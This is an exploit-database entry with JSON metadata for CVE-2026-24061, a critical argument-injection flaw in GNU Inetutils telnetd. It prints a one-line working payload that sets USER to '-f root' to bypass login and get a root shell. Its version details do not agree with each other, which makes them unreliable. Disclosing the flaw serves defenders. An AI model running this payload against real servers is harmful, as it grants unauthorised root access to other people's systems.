📄 GNU Inetutils 2.7 telnet Privilege Escalation_PACKETSTORM:214347

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Although Packet Storm has multiple exploits relating to this issue, this advisory keeps the details on the GNU Inetutils 2.7 telnetd privilege escalation vulnerability quite simple...

Visit Original Source

Basic Information

ID PACKETSTORM:214347

Published Jan 26, 2026 at 00:00

Affected Product

Affected Versions # Titles: Telnet Argument Injection Privilege Escalation - RCE
# Author: nu11secur1ty
# Date: 1/24/2026
# Vendor: https://www.gnu.org/software/inetutils/
# Software: https://www.gnu.org/software/inetutils/
# Reference:
https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/
# CVE-2026-24061

## Description:
Argument/Command Injection via the USER environment variable in the
inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client
improperly passes the USER environment variable contents as command-line
arguments to the telnet daemon (telnetd).

STATUS:
CRITICAL

## Affected Versions:
- inetutils-telnet 1.9-4+deb10u2 and earlier
- Debian 10 (buster) and derivatives
- Possibly other distributions with similar versions

# Attack Vector:
Network/Adjacent (requires telnet access)
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

[+]Payload:

```
USER="-f root" telnet -a 127.0.0.1 2323
```

# Demo:
[href](https://www.patreon.com/posts/telnet-argument-148994220)

# Time spent:
00:01:35

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>

{
    "lastseen": "2026-01-26T18:15:03",
    "description": "Although Packet Storm has multiple exploits relating to this issue, this advisory keeps the details on the GNU Inetutils 2.7 telnetd privilege escalation vulnerability quite simple...",
    "published": "2026-01-26T00:00:00",
    "modified": "2026-01-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 GNU Inetutils 2.7 telnet Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214347",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-24061"
    ],
    "sourceData": "# Titles: Telnet Argument Injection Privilege Escalation - RCE\n    # Author: nu11secur1ty\n    # Date: 1/24/2026\n    # Vendor: https://www.gnu.org/software/inetutils/\n    # Software: https://www.gnu.org/software/inetutils/\n    # Reference:\n    https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/\n    # CVE-2026-24061\n    \n    ## Description:\n    Argument/Command Injection via the USER environment variable in the\n    inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client\n    improperly passes the USER environment variable contents as command-line\n    arguments to the telnet daemon (telnetd).\n    \n    STATUS:\n    CRITICAL\n    \n    ## Affected Versions:\n    - inetutils-telnet 1.9-4+deb10u2 and earlier\n    - Debian 10 (buster) and derivatives\n    - Possibly other distributions with similar versions\n    \n    # Attack Vector:\n    Network/Adjacent (requires telnet access)\n    CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n    \n    [+]Payload:\n    \n    ```\n    USER=\"-f root\" telnet -a 127.0.0.1 2323\n    ```\n    \n    # Demo:\n    [href](https://www.patreon.com/posts/telnet-argument-148994220)\n    \n    # Time spent:\n    00:01:35\n    \n    \n    --\n    System Administrator - Infrastructure Engineer\n    Penetration Testing Engineer\n    Exploit developer at https://packetstormsecurity.com/\n    https://cve.mitre.org/index.html\n    https://cxsecurity.com/ and https://www.exploit-db.com/\n    home page: https://www.asc3t1c-nu11secur1ty.com/\n    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n    nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>",
    "sourceHref": "https://packetstorm.news/download/214347",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214347/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply